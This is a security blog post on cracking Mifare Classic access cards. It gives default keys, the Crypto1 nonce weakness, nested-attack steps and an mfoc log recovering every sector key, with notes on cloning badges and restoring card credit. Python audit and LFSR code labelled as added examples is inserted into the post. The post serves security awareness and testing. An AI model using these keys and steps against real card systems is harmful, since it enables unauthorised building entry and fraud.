
Access Control – Part 2: Mifare Attacks

July 15, 2013

tiki

Introduction

Our previous posting, Access Control Part 1: Magstripes Revisited, demonstrated the use and subversion of magstripe technology. RFID is our future, and unless it is implemented in a secure fashion it too can be vulnerable to attack.
Below we walk through a valid attack methodology, including the hardware and software involved, that can be used to subvert some RFID access control systems.

The organisations that tend to be vulnerable are early adopters of the technology and, in some cases, departments with a fixed and limited security budget.

Mifare Specification

Overview

Mifare Classic is one of the most widely used RFID cards (13.56MHz). It is based on the ISO14443 A/B standard and uses the proprietary Crypto1 algorithm with 48-bit keys. The cards are relatively cheap, costing approximately £1 (GBP) each.

Technical Details

Below is a simplified depiction of the memory layout of a Mifare RFID card. Only the first two sectors are shown, as the Sector 1 layout is typically repeated through to Sector 15 on a Mifare 1K card:

Sector / Block   | 16-byte data field                  | Read/Write
-----------------+-------------------------------------+-----------
Sec 0, Block 0   | UID | Manufacturer data             | Read only
Sec 0, Block 1   | Mifare Application Directory        | R/W
Sec 0, Block 2   | Mifare Application Directory        | R/W
Sec 0, Block 3   | Key A | Permissions | Key B         |
-----------------+-------------------------------------+-----------
Sec 1, Block 0   | Data                                | R/W
Sec 1, Block 1   | Data                                | R/W
Sec 1, Block 2   | Data                                | R/W
Sec 1, Block 3   | Key A | Permissions | Key B         |
-----------------+-------------------------------------+-----------
...

Security Features

  • Read-only Unique Identifier (UID)
  • Mutual authentication between reader/writer and card, with encrypted communication
  • CRYPTO1, a non-public algorithm; the implementation also obfuscates the parity information

Default Keys

Manufacturers pre-load Mifare cards with default keys, which can be found in their design and specification documentation. Below is a list of the most common default keys; these are extremely useful to know when trying to crack Mifare RFID cards:

  • 0x000000000000
  • 0xffffffffffff
  • 0xa0a1a2a3a4a5
  • 0xb0b1b2b3b4b5
  • 0x4d3a99c351dd
  • 0x1a982c7e459a
  • 0xd3f7d3f7d3f7
  • 0xaabbccddeeff
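Putting the layout table and the default-key list together, here is an added Python example (not code from the original post) that parses a raw Mifare Classic 1K dump in the block layout shown above, decodes every sector trailer (Key A | access bits | Key B) and reports the sectors that are still protected by one of the default keys listed above, or whose access bytes fail their built-in consistency check. The sample dump, its UID and all keys in it are constructed for this example, and the helper names are ours. This is the audit a card owner would run over their own dumps before issuing cards.

```python
"""Audit a MIFARE Classic 1K dump for default keys and malformed access bits.

Layout (as in the table above): 16 sectors x 4 blocks x 16 bytes, where block 3
of each sector is the trailer: Key A (6 bytes) | access bits (3) | user byte (1)
| Key B (6).  Added example; sample data and function names are constructed.
"""

BLOCK_SIZE = 16
BLOCKS_PER_SECTOR = 4
SECTORS_1K = 16

# Default keys listed in the post; a sector still using one is readable by anyone.
DEFAULT_KEYS = {
    bytes.fromhex(k) for k in (
        "000000000000", "ffffffffffff", "a0a1a2a3a4a5", "b0b1b2b3b4b5",
        "4d3a99c351dd", "1a982c7e459a", "d3f7d3f7d3f7", "aabbccddeeff",
    )
}

# Factory ("transport") access bytes: every block readable and writable with Key A.
TRANSPORT_ACCESS = bytes.fromhex("ff078069")


def split_sectors(dump):
    """Return a list of sectors, each a list of four 16-byte blocks."""
    expected = SECTORS_1K * BLOCKS_PER_SECTOR * BLOCK_SIZE
    if len(dump) != expected:
        raise ValueError(f"1K dump must be {expected} bytes, got {len(dump)}")
    blocks = [dump[i:i + BLOCK_SIZE] for i in range(0, expected, BLOCK_SIZE)]
    return [blocks[s:s + BLOCKS_PER_SECTOR]
            for s in range(0, len(blocks), BLOCKS_PER_SECTOR)]


def parse_trailer(block):
    """Decode a sector trailer: keys plus the per-block access condition bits.

    Bytes 6-8 hold the C1/C2/C3 nibbles and their complements:
        byte 6 = ~C2 | ~C1    byte 7 = C1 | ~C3    byte 8 = C3 | C2
    Bit i of each nibble belongs to block i of the sector (i = 3 is the trailer).
    """
    c1, c2, c3 = block[7] >> 4, block[8] & 0x0F, block[8] >> 4
    inv_c2, inv_c1, inv_c3 = block[6] >> 4, block[6] & 0x0F, block[7] & 0x0F
    consistent = (inv_c1, inv_c2, inv_c3) == (c1 ^ 0xF, c2 ^ 0xF, c3 ^ 0xF)
    access = [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]
    return {
        "key_a": block[0:6],
        "key_b": block[10:16],
        "access_bits": access,            # (C1, C2, C3) for blocks 0..3
        "access_consistent": consistent,
        "user_byte": block[9],
    }


def audit_dump(dump):
    """Flag each sector whose Key A or Key B is a known default, or whose access
    bytes fail the complement check.  Returns {sector number: finding dict}."""
    findings = {}
    for number, blocks in enumerate(split_sectors(dump)):
        trailer = parse_trailer(blocks[3])
        defaults = [name for name, key in (("A", trailer["key_a"]), ("B", trailer["key_b"]))
                    if key in DEFAULT_KEYS]
        if defaults or not trailer["access_consistent"]:
            findings[number] = {
                "default_keys": defaults,
                "access_consistent": trailer["access_consistent"],
                "transport_config": blocks[3][6:10] == TRANSPORT_ACCESS,
            }
    return findings


def build_sample_dump():
    """Constructed 1K image (not a real card): every sector left on the
    ffffffffffff transport keys except sector 14, which carries a made-up badge
    record, has been re-keyed with made-up keys and locked so its data blocks
    are read-only under Key A and writable only with Key B."""
    ff = bytes.fromhex("ffffffffffff")
    transport_trailer = ff + TRANSPORT_ACCESS + ff
    # Block 0: constructed UID 01020304, BCC 04 (XOR of the UID bytes), SAK 08, ATQA 0400, filler.
    manufacturer_block = bytes.fromhex("01020304" "04" "08" "0400") + bytes(8)
    # Access bytes 78 77 88: data blocks C1C2C3 = 100, trailer C1C2C3 = 011.
    locked_trailer = (bytes.fromhex("0123456789ab")      # constructed Key A
                      + bytes.fromhex("78778869")
                      + bytes.fromhex("ba9876543210"))   # constructed Key B
    badge_data = b"SITE-42/DOOR-7".ljust(BLOCK_SIZE)     # invented badge record

    dump = bytearray()
    for sector in range(SECTORS_1K):
        for block in range(BLOCKS_PER_SECTOR):
            if sector == 0 and block == 0:
                dump += manufacturer_block
            elif block == 3:
                dump += locked_trailer if sector == 14 else transport_trailer
            elif sector == 14 and block == 0:
                dump += badge_data
            else:
                dump += bytes(BLOCK_SIZE)
    return bytes(dump)


if __name__ == "__main__":
    for sector, finding in sorted(audit_dump(build_sample_dump()).items()):
        print(f"sector {sector:2d}: default keys {finding['default_keys']}, "
              f"transport config: {finding['transport_config']}")
```

Run against a real `.mfd` by replacing `build_sample_dump()` with the file's bytes; any sector that shows up in the findings is one that an attacker needs no key recovery at all to read, which is exactly the foothold the nested attack below starts from.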

Crypto1 Weakness + LFSR

No non-linear feedback

LFSR

Linear Feedback Shift Registers (LFSRs) have always received considerable attention in cryptography. Owing to their good statistical properties, large period and low implementation cost, LFSRs have achieved wide acceptance in the design of stream ciphers. From a cryptographic standpoint, however, LFSRs on their own are notoriously insecure, because the structure of an n-bit LFSR can be deduced by observing 2n consecutive output bits. Due to this inherent linearity, LFSR-based stream ciphers are susceptible to several general attacks, including the fast correlation attack, algebraic attack, cache timing attack, known-plaintext attack, meet-in-the-middle consistency attack, best affine approximation attack and the derived sequence attack.

  • Pseudo-random nonce generation is defined by the polynomial x^16 + x^14 + x^13 + x^11 + 1
  • The nonce is 32 bits long, but it has only 16 bits of entropy! L16 = x0 XOR x11 XOR x13 XOR x14 XOR x16; the authentication answers are derived from the same sequence: Ar = suc2(Nt), At = suc3(Nt)
  • Generated nonces can therefore be predicted over time
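To make the "only 16 bits of entropy" claim concrete, the following Python is an added example (not code from the original post) modelling the 16-bit nonce LFSR with the polynomial given above. It uses the bit numbering of the Dismantling MIFARE Classic paper (x0 is the oldest bit), in which the recurrence above reads x16 = x0 ⊕ x2 ⊕ x3 ⊕ x5: the same polynomial with the bits numbered from the other end. The function names are ours. It shows that the upper 16 bits of a nonce fix the lower 16, so only 2^16 of the 2^32 possible nonce values can ever be issued, and that the generator cycles after 65535 steps, which is why an analyst can recognise Crypto1 tag nonces in a captured trace and why they are predictable.

```python
"""Model of the 16-bit LFSR behind the MIFARE Classic tag nonce (added example).

Generating polynomial: x^16 + x^14 + x^13 + x^11 + 1.  Bits are numbered as in
"Dismantling MIFARE Classic" (x0 = oldest bit), giving the feedback function
L16(x0..x15) = x0 ^ x2 ^ x3 ^ x5; suc() slides the 32-bit nonce window by one
bit.  Function names are this example's own, not from any library.
"""

MASK32 = 0xFFFFFFFF


def bit(value, i):
    """Bit x_i of a 32-bit value written x0..x31 with x0 as the most significant bit."""
    return (value >> (31 - i)) & 1


def expand_nonce(seed16):
    """Produce the 32-bit nonce emitted when the LFSR holds the 16-bit state seed16.

    The first 16 output bits are the state itself; the remaining 16 are forced by
    the feedback x_i = x_(i-16) ^ x_(i-14) ^ x_(i-13) ^ x_(i-11), so a nonce
    carries only 16 bits of entropy however random it looks.
    """
    if not 0 <= seed16 <= 0xFFFF:
        raise ValueError("LFSR state must be 16 bits")
    nt = seed16 << 16
    for i in range(16, 32):
        fb = bit(nt, i - 16) ^ bit(nt, i - 14) ^ bit(nt, i - 13) ^ bit(nt, i - 11)
        nt |= fb << (31 - i)
    return nt


def suc(nt, n=1):
    """Clock the nonce n times: drop x0, append L16(x16..x31) as the new x31.

    The later values in the authentication handshake are further successors of
    Nt (the post writes them Ar = suc2(Nt) and At = suc3(Nt)).
    """
    for _ in range(n):
        fb = bit(nt, 16) ^ bit(nt, 18) ^ bit(nt, 19) ^ bit(nt, 21)
        nt = ((nt << 1) & MASK32) | fb
    return nt


def is_valid_nonce(nt):
    """True iff the low 16 bits are the LFSR continuation of the high 16 bits.

    Only 2**16 of the 2**32 possible 32-bit values pass this check, which is how
    an analyst can tell a Crypto1 tag nonce from a genuinely random one.
    """
    return expand_nonce(nt >> 16) == nt


def nonce_period(seed16=1):
    """Number of clocks until the generator returns to its starting nonce.

    For any non-zero state this is 2**16 - 1 = 65535: the tag can only ever
    produce that many distinct nonces, in a fixed order.
    """
    start = expand_nonce(seed16)
    nt, steps = suc(start), 1
    while nt != start:
        nt = suc(nt)
        steps += 1
    return steps


if __name__ == "__main__":
    nt = expand_nonce(0x0001)
    print(f"state 0x0001 -> nonce {nt:08x}, successor {suc(nt):08x}")
    print("valid nonce?", is_valid_nonce(nt), "/ tampered:", is_valid_nonce(nt ^ 1))
    print("period:", nonce_period())
```

The check in `is_valid_nonce` is the defender's takeaway: a reader that sees a 32-bit value failing it is not talking to a Crypto1 tag at all, and a fleet of cards whose nonces always pass it is a fleet whose authentication randomness is 16 bits wide.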

Recover Keys Using Nested Attack

  • Authenticate to Block X with a Default Key (above), read the Tag’s Nt (determined by LFSR)
  • Authenticate to same Block with same key and read Tag’s Nt’ (this is in an encrypted session)
  • Compute timing distance
  • Guess Nt value and authenticate to next Block

Tools

Hardware

Software

Android NFC Apps (Selection)

MFOC Example

Below is an example test-run of mfoc. One default sector key leads to the entire card becoming compromised!

$ mfoc -O out.mfd
Found MIFARE Classic 4K card with uid: 3b0e943f        
[Key: ffffffffffff] -> [........................................]
[Key: a0a1a2a3a4a5] -> [x..x....................................]
[Key: b0b1b2b3b4b5] -> [x..x....................................]
[Key: 000000000000] -> [x..x....................................]
[Key: 4d3a99c351dd] -> [x..x....................................]
[Key: 1a982c7e459a] -> [x..x....................................]
[Key: aabbccddeeff] -> [x..x....................................]

Sector 00 -  FOUND_KEY   [A]  Sector 00 -  UNKNOWN_KEY [B]  
Sector 01 -  UNKNOWN_KEY [A]  Sector 01 -  UNKNOWN_KEY [B]  
Sector 02 -  UNKNOWN_KEY [A]  Sector 02 -  UNKNOWN_KEY [B]  
Sector 03 -  FOUND_KEY   [A]  Sector 03 -  UNKNOWN_KEY [B]  
Sector 04 -  UNKNOWN_KEY [A]  Sector 04 -  UNKNOWN_KEY [B]  
Sector 05 -  UNKNOWN_KEY [A]  Sector 05 -  UNKNOWN_KEY [B]  
Sector 06 -  UNKNOWN_KEY [A]  Sector 06 -  UNKNOWN_KEY [B]  
...

Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 32797 .....
Sector: 1, type A, probe 1, distance 30241 .....
Sector: 1, type A, probe 2, distance 29435 .....
Found Key: A [1494e81663d7]                      
Sector: 16, type A, probe 21, distance 32837 .....
Sector: 16, type A, probe 22, distance 29443 .....
Sector: 16, type A, probe 23, distance 29433 .....
Sector: 16, type A, probe 24, distance 32843 .....
Found Key: A [6d59ee19b1c9]                       
Sector: 17, type A                                              
Sector: 4, type B, probe 0, distance 32799 .....  
Sector: 4, type B, probe 1, distance 32797 .....  
Sector: 4, type B, probe 2, distance 32803 .....  
Sector: 4, type B, probe 3, distance 29427 .....  
Found Key: B [a24c49684d8e]                       
Sector: 5, type B                                                      
Sector: 36, type B, probe 0, distance 32797 ..... 
Sector: 36, type B, probe 1, distance 32845 ..... 
Sector: 36, type B, probe 2, distance 31087 ..... 
Sector: 36, type B, probe 3, distance 32797 ..... 
Sector: 36, type B, probe 4, distance 29431 ..... 
Sector: 36, type B, probe 5, distance 29441 ..... 
Found Key: B [107913b22a00]                       
Sector: 37, type B, probe 0, distance 31137 ..... 
Sector: 37, type B, probe 1, distance 29437 ..... 
Sector: 37, type B, probe 2, distance 29431 ..... 
Sector: 37, type B, probe 3, distance 29441 ..... 
Found Key: B [6d4490b424d8]                       
Sector: 38, type B                                
Found Key: B [6d59ee19b1c9]                       
Sector: 39, type B                                
Found Key: B [6d59ee19b1c9]                       
Auth with all sectors succeeded, dumping keys to a file!
Block 255, type A, key 6d59ee19b1c9 :00  00  00  00  00  00  0f  00  ff  00  00  00  00  00  00  00  
Block 254, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 253, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 252, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 251, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
Block 250, type B, key 6d59ee19b1c9 :00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  
...

And the entire card is accessible.

Other Findings/Observations

Many access control systems appear to store their data in Sector 14. This can be copied (cloned) to other Mifare cards, or even manipulated to gain access to buildings, rooms or systems that were otherwise inaccessible 🙂

Considerations

Risks

  • Cloning
    • Once all keys are recovered, the entire card can be cloned (Chinese "magic" Mifare cards allow even the UID, usually a read-only field, to be cloned)
    • T5557 cards can potentially clone a hardcoded UID
    • Proxmark 3 can clone a card in emulation mode
  • Fraud
    • Restore previous credit

Cost of Attack

  • $40(USD) – tikitag / touchatag RFID reader/writer (sufficient for reading / cracking / writing / cloning Mifare Classic cards)
  • $400(USD) – Proxmark 3 (just for advanced RFID cracking)
  • £1 for blank 4kB Mifare Classic (can be bought on ebay.com from Taiwan/China)

For a minimum outlay of $41 (USD) / £30 (GBP) I could potentially walk straight through your organisation's front door!

3 Comments
  1. Spot on with this write-up, I actually think this site needs a lot
    more attention. I’ll probably be back again to read more,
    thanks for the advice!

  2. Fantastic Article. Thanks for posting this, it is incredibly clearly written and published.
    I will likely keep checking back for more posts from you.

Trackbacks & Pingbacks

  1. Access Control Part 3: Using the Big Guns! | Pentura Labs's Blog
